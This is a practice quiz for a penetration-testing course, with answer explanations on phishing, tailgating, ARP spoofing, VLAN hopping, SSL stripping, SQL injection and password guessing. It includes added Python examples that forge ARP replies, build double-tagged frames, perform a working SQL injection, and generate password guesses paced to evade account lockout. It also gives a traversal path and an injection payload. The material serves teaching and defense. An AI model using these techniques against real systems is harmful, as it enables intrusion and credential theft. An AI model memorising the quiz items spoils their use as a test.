CSIT 188 Midterm CH 3 Practice
117. Which of the following are examples of unsecure coding practices? A. Including comments in the source code B. Checking input fields for properly formatted information C. Including subroutines for handling error conditions D. Digitally signing the code E. Providing verbose error messages
A and E. Commenting source code is a good practice for programmers, but comments that ship with the application (for example, in client-side HTML or JavaScript) can create a security weakness because they hand an attacker (or penetration tester) who views the source extensive information about how the application works. Likewise, verbose error messages are useful while the application is being developed, but leaving them enabled in the released application can leak stack traces, file paths, database table names, or software versions to an attacker. Users should see a generic error message, with the details written to a server-side log.
1. You are conducting a black box penetration test for a client. You have used reconnaissance tools to create a list of employee email addresses within the target organization. You craft an email addressed to all of the employees warning them that they must change their password within 24 hours or they will lose access. When they click the link provided in the email, they are redirected to your own website where their credentials are captured to a text file. What kind of exploit did you use? A. Phishing B. Vishing C. Smishing D. Whaling
A. A phishing attack was used in this scenario because the malicious email was sent indiscriminately to all the employees within the organization.
14. Which exploit relies on a telephone call to convince someone to reveal sensitive information? A. Vishing B. Spear phishing C. Phishing D. Whaling
A. A voice phishing attack (also called a vishing attack) leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.
121. While performing a gray box penetration test, you have discovered that the target organization uses many different operating systems on their computers. You've fingerprinted Windows, Mac OS, and Linux systems. You even found one UNIX server system. In addition, employees are bringing their mobile devices to work and connecting them to the organization's wireless network, so you found many Android and iOS devices. At this point in the test, you need to identify operating system vulnerabilities that exist with high-value devices. What should you do? A. Research the Common Vulnerabilities and Exposures (CVE) database. B. Research the Common Attack Pattern, Enumeration and Classification (CAPEC) database. C. Research the Computer Emergency Response Team (CERT) website. D. Post a question on a penetration testing forum.
A. An effective way to discover vulnerabilities associated with a specific version of an operating system is to consult the Common Vulnerabilities and Exposures (CVE) database. The CVE database can be accessed at http://cve.mitre.org. It contains a list of publicly known cybersecurity vulnerabilities, each with a unique identifier (CVE-YYYY-NNNN, with four or more digits in the final field) that vulnerability scanners and vendor advisories reference. Entries are assigned by CVE Numbering Authorities (CNAs), which include many vendors as well as security researchers and coordinating organizations, when a vulnerability is publicly disclosed, so it is not a vendor-only list. The database contains vulnerability information for Windows, Mac OS, Linux, UNIX, Android, and iOS operating systems. CAPEC catalogs attack patterns rather than specific product vulnerabilities, and CERT publishes advisories but is not the authoritative vulnerability list.
42. A penetration tester impersonates a vending machine repair person to gain physical access to the target organization's facility. Once inside, he notices that the door to the server room uses a simple pushbutton door lock that doesn't use any kind of electronic authentication. Which physical security attack could he use to gain access to the server room? A. Lock picking B. Tailgating C. Fence jumping D. Egress sensor bypass
A. Because the server room is protected by a relatively unsophisticated locking mechanism, the penetration tester could pick the lock to gain access, assuming he has the necessary lock-picking skills. Note that this would have to be done in an area without surveillance or foot traffic as it may take some time to complete.
85. During a gray box penetration test, the tester decides to stress test the target organization's file server by sending it a flood of half-open TCP connections that never actually get completed. What kind of exploit is this? A. Denial of service (DoS) B. Distributed denial of service (DDoS) C. Replay attack D. NAC bypass
A. Each half-open connection occupies a slot in the server's SYN backlog until it times out. By flooding the server with SYN packets whose handshakes never complete, the tester fills that backlog so the server no longer has the resources to service legitimate connection requests. Because only one host was used to conduct the stress test, this is an example of a standard denial-of-service (DoS) attack rather than a distributed one. Modern operating systems mitigate this with SYN cookies (on Linux, net.ipv4.tcp_syncookies = 1), which avoid allocating connection state until the handshake completes.
21. A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be the director of operations. The email asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario? A. Authority B. Scarcity C. Social proof D. Likeness
A. By masquerading as an upper-level manager, the penetration tester in this example utilized an appeal to authority to coerce the employee into divulging sensitive information.
84. During a gray box penetration test, the tester wants to implement a downgrade man-in- the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa? A. ARP spoofing B. Replay attack C. Pass the Hash D. SYN attack
A. By sending forged ARP replies, the tester's workstation can fool client workstations into thinking it is the web server by associating the server's IP address with her workstation's MAC address. Likewise, the server can be fooled into thinking her workstation is the end user's workstation by doing the same thing: sending a forged ARP reply to the server that maps the client's IP address to her workstation's MAC address. ARP is not routed, so this only works when the tester is in the same broadcast domain as the victims, and her workstation must forward the intercepted traffic (for example, with IP forwarding enabled) or the result is a denial of service rather than a man-in-the-middle position. Dynamic ARP Inspection on the switch, or static ARP entries for critical hosts, defends against it.
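The forged reply and a check for it, as an added example that is not part of the original study guide. The first function builds the 42-byte Ethernet/ARP frame the tester would send to one victim (shown here as bytes; putting it on the wire needs a raw socket and root). The rest parses arp -a output and flags the two symptoms of poisoning: one MAC answering for several IPs, and a known host whose MAC has changed. The ARP table and all MAC and IP values are constructed for the example.

```python
import re
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806   # EtherType that marks an ARP payload
ARP_REPLY = 2        # ARP opcode: reply


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> six raw bytes."""
    return bytes(int(part, 16) for part in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    """'10.0.0.3' -> four raw bytes."""
    return bytes(int(part) for part in ip.split("."))


def build_arp_reply(victim_mac: str, victim_ip: str, claimed_ip: str, attacker_mac: str) -> bytes:
    """The poisoning frame: tells victim_ip that claimed_ip lives at attacker_mac.

    One frame to the client claiming the server's IP, and one to the server
    claiming the client's IP, puts the attacker in the middle of both directions.
    """
    ethernet = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1, 0x0800,            # hardware type Ethernet, protocol type IPv4
        6, 4,                 # hardware and protocol address lengths
        ARP_REPLY,
        mac_bytes(attacker_mac), ip_bytes(claimed_ip),   # sender fields carry the lie
        mac_bytes(victim_mac), ip_bytes(victim_ip),      # target fields name the victim
    )
    return ethernet + arp


# Constructed `arp -a` output from a Linux host (not a real capture). The file
# server's entry now shows the same MAC as an unknown host at 10.0.0.50.
SAMPLE_ARP_TABLE = """\
gateway (10.0.0.1) at 00:11:22:33:44:55 [ether] on eth0
fileserver (10.0.0.3) at de:ad:be:ef:00:01 [ether] on eth0
dev-1 (10.0.0.7) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (10.0.0.50) at de:ad:be:ef:00:01 [ether] on eth0
"""

ARP_ENTRY = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I
)


def parse_arp_table(text: str) -> dict:
    """{ip: mac} from `arp -a` style lines; incomplete entries without a MAC are skipped."""
    entries = {}
    for line in text.splitlines():
        m = ARP_ENTRY.search(line)
        if m:
            entries[m.group("ip")] = m.group("mac").lower()
    return entries


def find_shared_macs(entries: dict) -> dict:
    """{mac: [ips]} for every MAC that answers for more than one IP address."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_bindings(baseline: dict, current: dict) -> dict:
    """{ip: (expected_mac, seen_mac)} for hosts whose MAC differs from a known-good baseline."""
    return {ip: (baseline[ip], mac) for ip, mac in current.items()
            if ip in baseline and baseline[ip] != mac}
```

A MAC that legitimately serves several IPs (a router with secondary addresses, a VRRP pair) will trip find_shared_macs, so the baseline comparison is the more reliable signal; fed from periodic ARP snapshots, that comparison is essentially what arpwatch does.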
90. Which method is commonly used to hop between VLANs? A. Double-tagging B. Brute-force attacks C. MAC address spoofing D. DNS poisoning
A. The 802.1Q specification allows a frame to carry more than one VLAN tag, and double-tagging abuses this. The attacker sends a frame whose outer tag matches the native VLAN of the trunk and whose inner tag names the VLAN to reach. The first switch strips the outer tag, because native-VLAN frames are sent untagged on the trunk, and forwards the frame with the inner tag still attached; the next switch reads that inner tag and delivers the frame into the target VLAN. This allows a host to "hop" between VLANs. The attack is unidirectional (replies do not come back) and only works when the attacker's access port is in the trunk's native VLAN, which is why the defense is to set the native VLAN to an unused VLAN ID, keep access ports out of it, and tag native-VLAN traffic on trunks.
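The frame format and the switch behaviour that makes the hop possible, as an added example that is not part of the original study guide. It builds a real double-tagged Ethernet frame with struct, then models the two trunk-side decisions that matter: the first switch removing the outer tag because it belongs to the native VLAN, and the second switch assigning the frame to whatever tag is left. The model assumes the attacker's port is in the native VLAN and that the frame reaches the trunk with both tags intact; MAC addresses and the IPv4 payload are placeholders.

```python
import struct

TPID_8021Q = 0x8100      # Tag Protocol Identifier for an 802.1Q VLAN tag
ETHERTYPE_IPV4 = 0x0800


def vlan_tag(vid: int, pcp: int = 0) -> bytes:
    """One 4-byte 802.1Q tag: TPID, then the TCI word holding priority and VLAN ID."""
    if not 0 <= vid <= 4094:
        raise ValueError("VLAN ID out of range")
    return struct.pack("!HH", TPID_8021Q, (pcp << 13) | vid)


def build_frame(dst_mac: bytes, src_mac: bytes, vids, payload: bytes) -> bytes:
    """Ethernet frame carrying zero or more stacked tags, outermost first."""
    tags = b"".join(vlan_tag(v) for v in vids)
    return dst_mac + src_mac + tags + struct.pack("!H", ETHERTYPE_IPV4) + payload


def parse_vids(frame: bytes) -> list:
    """VLAN IDs of every stacked tag after the MAC addresses, outermost first."""
    vids, offset = [], 12
    while struct.unpack_from("!H", frame, offset)[0] == TPID_8021Q:
        tci = struct.unpack_from("!H", frame, offset + 2)[0]
        vids.append(tci & 0x0FFF)
        offset += 4
    return vids


def trunk_egress(frame: bytes, native_vid: int, tag_native: bool = False) -> bytes:
    """What the first switch puts on the trunk. Frames belonging to the native VLAN
    are sent untagged, so the outermost tag is removed; with native-VLAN tagging
    enabled (Cisco: vlan dot1q tag native) the tag is kept."""
    vids = parse_vids(frame)
    if vids and vids[0] == native_vid and not tag_native:
        return frame[:12] + frame[16:]   # drop the 4-byte outer tag, keep everything else
    return frame


def trunk_ingress_vlan(frame: bytes, native_vid: int) -> int:
    """VLAN the second switch assigns: the outermost tag if present, else the native VLAN."""
    vids = parse_vids(frame)
    return vids[0] if vids else native_vid


def hop_result(attacker_vid: int, target_vid: int, native_vid: int, tag_native: bool = False) -> int:
    """End to end: an attacker in attacker_vid sends a double-tagged frame aimed at
    target_vid. Returns the VLAN in which the frame is finally delivered."""
    frame = build_frame(bytes.fromhex("ffffffffffff"), bytes.fromhex("aabbccddee01"),
                        [attacker_vid, target_vid], b"\x45" + b"\x00" * 19)
    return trunk_ingress_vlan(trunk_egress(frame, native_vid, tag_native), native_vid)
```

With the native VLAN left at 1 and the attacker in VLAN 1, hop_result(1, 20, 1) returns 20: the hop succeeds. Moving the native VLAN to an unused ID, or tagging native traffic, leaves the outer tag in place and the frame stays in VLAN 1.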
41. A penetration tester rifles through the target organization's garbage and finds an optical disc. He reads the disc on his laptop and finds that it contains several very sensitive files from human resources. What kind of exploit occurred in this scenario? A. Dumpster diving B. Tailgating C. Fence jumping D. Egress sensor bypass
A. Dumpster diving occurs when an attacker searches through the target organization's garbage looking for sensitive information.
49. A penetration tester observes that the target organization's garbage is picked up early in the morning every Tuesday. Late Monday night, she climbs into the organization's garbage receptacle and gathers discarded documents, optical discs, and storage devices such as flash drives. What kind of exploit occurred in this scenario? A. Dumpster diving B. Tailgating C. Fence jumping D. Egress sensor bypass
A. Dumpster diving occurs when an attacker searches through the target organization's garbage looking for sensitive information.
114. Which security misconfiguration on a web server would allow an end user accessing the site with a web browser to navigate through the web server's file system? A. Directory traversal B. Cookie manipulation C. File inclusion D. Weak credentials
A. If the web server (or the application it hosts) builds file paths from user-supplied input without validation, a request such as ../../../etc/passwd can climb out of the document root and expose the server's file system to users accessing the site in a web browser, including directories outside of the web server's root directory. This is directory traversal. The defense is to canonicalize the requested path and confirm it still lies inside the document root before opening it, and to run the server with least privilege; for example, the Apache web server can be run in a chroot jail so that even a successful traversal cannot reach files outside of the web server's directories.
7. You are performing a black box penetration test for a large financial organization. Using reconnaissance techniques, you have identified the vendor that services the vending machines within the organization's main headquarters. You dress in a similar uniform as the vendor's employees. You also purchase a hand truck and several cases of soda pop. The receptionist of the target organization allows you to enter and directs you to the break room. What kind of exploit did you use in this scenario? A. Impersonation B. Smishing C. Vishing D. Elicitation
A. Impersonation is a social engineering technique that a penetration tester can use to gain physical access to the target's facility. In this scenario, the receptionist allowed the tester into the facility because the tester appeared to be from a trusted vendor.
92. Which wireless exploit uses a special wireless device to listen for SSID requests from other wireless devices and then impersonate the requested access point? A. Karma attack B. Deauth attack C. Downgrade attack D. Rogue access point
A. In a Karma attack, the tester uses a special wireless device to listen for SSID probe requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims' traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim's traffic and capture sensitive information. Modern mobile operating systems probe less freely for remembered networks than they once did, which reduces, but does not eliminate, the attack's effectiveness.
12. Which exploit sends emails indiscriminately to a large number of the target organization's employees, anticipating that a percentage of them will click the malicious link contained in the message? A. Phishing B. Spear phishing C. SMS phishing D. Whaling
A. In a standard phishing exploit, email messages are sent indiscriminately to a large number of individuals, hoping that a percentage of them will click the malicious link contained in the message.
81. Which type of exploit fools a web server into presenting a user's web browser with an HTTP connection instead of an HTTPS connection as the user originally requested? A. SSL stripping B. Relay attack C. NAC bypass D. Cross-site scripting
A. In an SSL stripping attack, the user intends to reach the site over HTTPS so that communications between the browser and the server are encrypted. The attacker, positioned as a man-in-the-middle, keeps a normal HTTPS connection to the web server but serves the victim plain HTTP, rewriting the https:// links and redirects in the server's responses to http:// as they pass through. The server sees an ordinary HTTPS client and the browser sees an ordinary HTTP site, so unless the user notices the missing padlock, the user may not realize that the session is unencrypted. HTTP Strict Transport Security (HSTS) defeats the attack for hosts the browser has already seen over HTTPS (or that are on the browser's preload list), because the browser then refuses to send plain HTTP to that host.
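The two halves of the exchange, as an added example that is not part of the original study guide: the rewriting the man-in-the-middle performs on relayed responses, and the browser-side HSTS bookkeeping that stops it. The page, headers and host names are constructed; a real stripping proxy would additionally terminate the victim's TCP connection and open its own HTTPS connection to the server.

```python
import re

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


def strip_https(body: str, remembered: dict) -> str:
    """Attacker side: rewrite every https:// URL the server sent to http:// so the
    victim's next request arrives in plaintext. The original URL is recorded so the
    proxy can re-upgrade the request when forwarding it to the real server."""
    def downgrade(match):
        original = match.group(0)
        stripped = "http://" + original[len("https://"):]
        remembered[stripped] = original
        return stripped
    return HTTPS_URL.sub(downgrade, body)


def strip_redirect(headers: dict, remembered: dict) -> dict:
    """Same treatment for a 301/302 'Location: https://...' redirect, which is how
    most sites move an http:// visitor onto HTTPS and where stripping usually starts."""
    out = dict(headers)
    if "Location" in out:
        out["Location"] = strip_https(out["Location"], remembered)
    return out


HSTS_MAX_AGE = re.compile(r"max-age\s*=\s*(\d+)", re.I)


def remember_hsts(hsts_store: dict, host: str, response_headers: dict) -> None:
    """Browser side: an HTTPS response carrying Strict-Transport-Security pins the host.
    Browsers ignore the header on plain-HTTP responses, which the proxy drops anyway,
    so the policy has to have been learned on an earlier, unattacked visit."""
    value = response_headers.get("Strict-Transport-Security", "")
    m = HSTS_MAX_AGE.search(value)
    if m:
        hsts_store[host] = int(m.group(1))


def browser_accepts_plain_http(hsts_store: dict, host: str) -> bool:
    """With an HSTS entry the browser upgrades http:// to https:// itself, so the
    stripped link never produces a plaintext request the attacker can intercept."""
    return hsts_store.get(host, 0) <= 0
```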
16. Which social engineering technique is least likely to be used during a penetration test? A. Interrogation B. Impersonation C. Shoulder surfing D. USB key drop
A. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers because it would likely result in criminal charges against the tester as well as civil litigation.
52. Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization? A. Emergency fail open B. Automatic locking C. Automatic unlocking via motion sensor for egress D. Automatic unlocking via light sensor for egress
A. Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door.
35. Which motivation factor gets people to act because they want to please the person making a request of them? A. Likeness B. Social proof C. Authority D. Scarcity
A. Most people will help someone they perceive to be a friend. This is called likeness. When someone they believe to be a friend needs help, they may bend or break the rules to help the person out.
56. During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ DEV-1 <20> UNIQUE 10.0.0.3 517 What do you know about the DEV-1 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
A. NBTSTAT lists each NetBIOS name with a hexadecimal suffix that identifies the service that registered it. The <20> suffix is registered by the Server service, which is what offers file and print shares. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service). Note that any Windows host with File and Printer Sharing enabled also registers <20>, so in practice the suffix tells you the host offers SMB shares rather than that it runs a server edition of Windows.
55. A penetration tester is performing a gray box test for a client. During a network scan, she notices a host that has TCP port 139 open. She suspects this is a Windows system, so she runs the NBTSTAT command and discovers key information about the host. Which protocol on the remote host allowed the tester to gather this information? A. NetBIOS B. SNMP C. NAC D. SMTP
A. NetBIOS is a session-layer service that Windows systems use to share resources, such as shared folders or printers; carried over TCP/IP (NetBIOS over TCP/IP, or NBT) it uses UDP port 137 for the name service, UDP port 138 for datagrams, and TCP port 139 for sessions. Once an attacker identifies that port 139 is open on a device, NBTSTAT can be used to footprint the device. For example, you could discover the device's computer name, its workgroup or domain, and whether the Server service is registered, which indicates a server or a host offering shares. All of this information can be gathered without any kind of authentication, because the name service answers queries from anyone who can reach it.
87. Which of the following prevents unauthorized or unhealthy devices from connecting to a network, even if they connect to the wired or wireless network properly? A. Network Access Control (NAC) B. WPA2-PSK C. Virtual LANs (VLANs) D. Spanning Tree Protocol (STP)
A. Network access control (NAC) systems require network hosts to meet security policy requirements before being allowed to access the network, even if they have properly been connected to a network jack or associated with an access point. Unauthorized or unhealthy devices are usually placed on an isolated remediation network until they are authorized or until they are brought into compliance. After doing so, they are allowed to connect to the actual network segment.
71. Which of the following is a mechanism that can be used to defend against DNS poisoning attacks? A. Implement DNSSEC. B. Close port 53 in the DNS server's host firewall. C. Disable ICMP forwarding in your router configuration. D. Use SSH for DNS queries.
A. One way to defend against DNS poisoning is to implement DNSSEC. DNSSEC does not sign or encrypt the queries themselves; instead, the zone owner digitally signs each set of DNS records, and a validating resolver checks those signatures along a chain of trust from the root zone down. A forged record injected by an attacker will not carry a valid signature, so a validating resolver discards it rather than caching it, which makes it difficult to insert poisoned records. Closing port 53 would stop the server from answering DNS at all, and SSH is not a DNS transport.
67. During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send whaling emails to the organization's CEO and CFO. How can you do this remotely from your laptop? A. Telnet to the SMTP server's IP address on port 25 and create the messages. B. Use physical security exploits to gain access to the server console where you can create the messages. C. Use impersonation to trick the server administrator into revealing its Remote Desktop password. D. None of the above.
A. One way to leverage an open SMTP service to send unauthorized email messages is to connect to the SMTP server's IP address on port 25 using a Telnet client. Once the connection has been established, you can type the SMTP commands (EHLO, MAIL FROM, RCPT TO, DATA) directly to create and send the messages. The server will accept the message only if it relays for the recipient's domain or, as in this scenario, delivers mail addressed to its own domain without requiring authentication.
32. Which motivation factor gets people to act because they believe that "everyone else is doing it"? A. Social proof B. Fear C. Scarcity D. Authority
A. People can be motivated to act if they think that everyone else is doing the same thing. This is called social proof. The (flawed) assumption is that if everyone else is doing something, it must be the right thing to do.
37. A penetration tester enters the target organization's physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent. Some references use tailgating for following without the authorized person's knowledge and reserve piggybacking for cases where the authorized person knowingly holds the door; this answer key treats catching the door behind an employee as piggybacking.
47. A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized people's knowledge or consent.
39. A penetration tester waits in the target organization's parking lot until she sees a large group of employees returning from lunch. She inserts herself quietly at the back of the group. The first person in the group uses his badge to unlock a secured door. The penetration tester is able to move through the door with the rest of the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
64. Which port is used by the SNMP protocol? A. UDP 161 B. TCP 23 C. TCP 389 D. UDP 88
A. The SNMP protocol runs on UDP port 161.
27. During a penetration test, you send an email to the CFO of the target organization. The email claims that the webcam on the CFO's laptop has been clandestinely used to record him viewing pornography. The email threatens to post this video and notify his family, his employer, and the police if he doesn't respond with certain sensitive information about his company. Which motivation factor was used in this scenario? A. Fear B. Social proof C. Authority D. Scarcity
A. The penetration tester is using fear as a motivating factor. Whether the claim is true or not, the CFO knows that such a revelation could damage his family and career. It could also expose him to prosecution. This could potentially motivate him to divulge sensitive information.
24. A penetration tester sends a phishing email to the employees of the target organization. The link in the email leads to a fake website that lists more than 1,000 reviews with an average rating of 4.9 stars. What motivation factor did the penetration tester use in this scenario? A. Social proof B. Urgency C. Scarcity D. Authority
A. The penetration tester is using social proof as a motivating factor. Because it appears that more than 1,000 people have had a positive experience with the website, most of the employees will probably trust the site, even if it asks them to divulge sensitive information.
107. The network administrator for an organization that is the target of a penetration test configured her network firewall with an administrative username of admin and a password of password. Which authentication exploit is this device vulnerable to? A. Weak credentials exploit B. Redirect attack C. Session hijacking D. Kerberos exploit
A. This device is vulnerable to a weak credentials exploit because the administrative username and password are easy to guess.
80. During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester views the data in the packets but does not modify it before forwarding the data on to the server. What kind of exploit is this? A. Relay attack B. DNS cache spoofing C. Pass the hash D. Replay attack
A. This is an example of a relay attack. The attacker sits between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation; to the workstation, the attacker poses as the server. In a relay attack, the man-in-the-middle may or may not modify the data being transmitted between the two hosts; merely reading it on the way through still qualifies. A replay attack, by contrast, re-sends previously captured data (such as an authentication exchange) at a later time.
70. You are conducting a gray box penetration test. You want to capture C-level executives' authentication credentials. To accomplish this, you set up a fake internal web server that looks exactly like the web server used to manage employee time-off and reimbursement requests. You inject a fake DNS record into the organization's DNS server that redirects traffic from the real server to your fake server. What is this exploit called? A. DNS poisoning B. ARP poisoning C. Phishing D. Whaling
A. This is an example of DNS poisoning. This exploit leverages the trust users have in a URL that appears to be valid. Because users enter the correct URL, they have no idea that an exploit is being conducted. However, the DNS server has been given a forged record, so it resolves the domain name in the URL to the IP address of the malicious server. If the real server used HTTPS, the fake server would need a certificate the victims' browsers trust, so the tester would also have to deal with certificate warnings.
102. A penetration tester is searching for vulnerabilities within a web application used by the target organization. In the login page, she enters the following string of text in the Password field: UNION SELECT Username, Password FROM Users; What type of exploit is being used in this example? A. SQL injection B. HTML injection C. Command injection D. Code injection
A. This is an example of a SQL injection attack. Instead of entering a password into the Password field, the tester inserts a SQL fragment. If the web application builds its query by concatenating the field's contents into the SQL text, the injected UNION SELECT can cause the query to return the username and password of every user in the hypothetical database. (In practice the payload also has to close the quoted string literal the application wraps around the password, for example ' UNION SELECT Username, Password FROM Users--, with the trailing comment discarding the rest of the original statement.) The UNION SELECT statement combines the result sets of two SELECT queries, so it can pull data from a table the original query never referenced, provided the column counts match. A well-written application uses parameterized queries (prepared statements) so that user input is never interpreted as SQL, together with input validation. The same principle, keeping data separate from code, applies to HTML injection, command injection, and code injection attacks.
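The injection carried through against a real database engine, as an added example that is not part of the original study guide. It uses Python's built-in sqlite3 with an in-memory users table of constructed rows (not real credentials), shows the string-concatenated login the quiz describes returning every user's password when fed a completed version of the quiz's payload, and then shows the parameterized version treating the same text as just a wrong password.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "Winter2019!"), ("bob", "hunter2"), ("cfo", "Q4-bonus")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String concatenation: attacker-controlled text becomes part of the SQL."""
    query = ("SELECT username, password FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchall()


def login_safe(conn, username: str, password: str):
    """Parameterized query: the driver sends values separately from the statement text,
    so a quote or a keyword in the input can never change the statement's structure."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()


# The quiz's payload, completed so it closes the string literal around the password
# field; '--' turns the rest of the original statement into a comment.
PAYLOAD = "' UNION SELECT username, password FROM users--"


def built_statement(username: str, password: str) -> str:
    """The exact SQL text the vulnerable function sends, for inspection."""
    return ("SELECT username, password FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))
```

The vulnerable query becomes SELECT ... WHERE username = 'nobody' AND password = '' UNION SELECT username, password FROM users--', whose first SELECT matches nothing and whose UNION returns the whole table; the column count of the injected SELECT has to equal that of the original, which is why testers probe with ORDER BY n or UNION SELECT NULL,NULL... first.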
103. A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this? A. Credential brute-forcing B. Session hijacking C. Redirect attack D. Password cracking
A. This is an example of a credential brute-forcing attack, performed online against the live login service. In a pure brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. By creating a list of likely passwords based on the user's personal interests (a targeted dictionary attack), the probability of success with a small number of attempts is greatly increased. Password cracking, by contrast, is done offline against captured password hashes. Account lockout and rate limiting on the login service are the main defenses against online guessing, so a tester must keep the number of attempts per account below the lockout threshold.
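How the OSINT seeds become a candidate list, and why the lockout threshold bounds the attack, as an added example that is not part of the original study guide. The seeds, the mutation rules and the stand-in authenticator (an account named cio with a constructed password) are all assumptions; against a real target the authenticate callable would submit the login form.

```python
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def generate_candidates(seeds, years=("2022", "2023", "2024"), suffixes=("", "!", "1", "123")):
    """Expand OSINT seeds (spouse, pet, team, town) into the forms people really choose:
    casing variants, leet substitutions, an appended year, and a trailing symbol or digits."""
    forms = set()
    for seed in seeds:
        base = seed.replace(" ", "")
        variants = {base.lower(), base.upper(), base.capitalize(),
                    base.capitalize().translate(LEET)}
        for variant in variants:
            for year in ("",) + tuple(years):
                for suffix in suffixes:
                    forms.add(variant + year + suffix)
    return sorted(forms)


def online_guess(authenticate, username: str, candidates, lockout_threshold=None):
    """Try candidates against a live login in order, stopping one short of a known
    lockout threshold so the account is not locked (and the defender not alerted).
    Returns (password or None, attempts made)."""
    attempts = 0
    for password in candidates:
        if lockout_threshold is not None and attempts >= lockout_threshold - 1:
            break
        attempts += 1
        if authenticate(username, password):
            return password, attempts
    return None, attempts


def demo_authenticate(username: str, password: str) -> bool:
    """Constructed stand-in for the target's login form (not a real account)."""
    return username == "cio" and password == "Rover2023!"
```

Two seeds already yield well over a hundred candidates, far more than a five-attempt lockout allows per account; that arithmetic is why testers spread guesses across many accounts (password spraying) or wait out the lockout window rather than hammer one login.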
79. During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester's workstation poses as the client to the server. What kind of exploit is this? A. Relay attack B. DNS cache spoofing C. Pass the hash D. Replay attack
A. This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.
4. You are performing a black box penetration test for a medium-sized organization that sells imported clothing. You have used reconnaissance techniques to identify a key software developer. You send this employee a personalized text message containing a Bitly URL that points to your own website where you capture information to a text file. What kind of exploit did you use in this scenario? A. Phishing B. Smishing C. Vishing D. Whaling
B. An SMS phishing attack (also called a smishing attack) was used in this scenario. A smishing attack leverages text messaging instead of email to conduct a phishing exploit. The shortened Bitly URL hides the real destination from the recipient.
5. You are performing a black box penetration test for a small organization that wholesales imported electronic devices in the United States. You have used reconnaissance techniques to identify a receptionist's phone number as well as the organization's printer vendor. You call this receptionist, pretending to be a sales rep from the vendor. You ask the receptionist for information about their printers, workstations, operating systems, and so on, to learn more about the organization's network infrastructure. What kind of exploit did you use in this scenario? A. Smishing B. Vishing C. Spear phishing D. Whaling
B. A voice phishing attack (also called a vishing attack) was used in this scenario. A vishing attack leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.
76. An ARP spoofing attack is categorized as which type of exploit? A. Denial of service (DoS) B. Man-in-the-middle C. Distributed denial of service (DDoS) D. VLAN hopping
B. An ARP spoofing attack is classified as a man-in-the-middle attack.
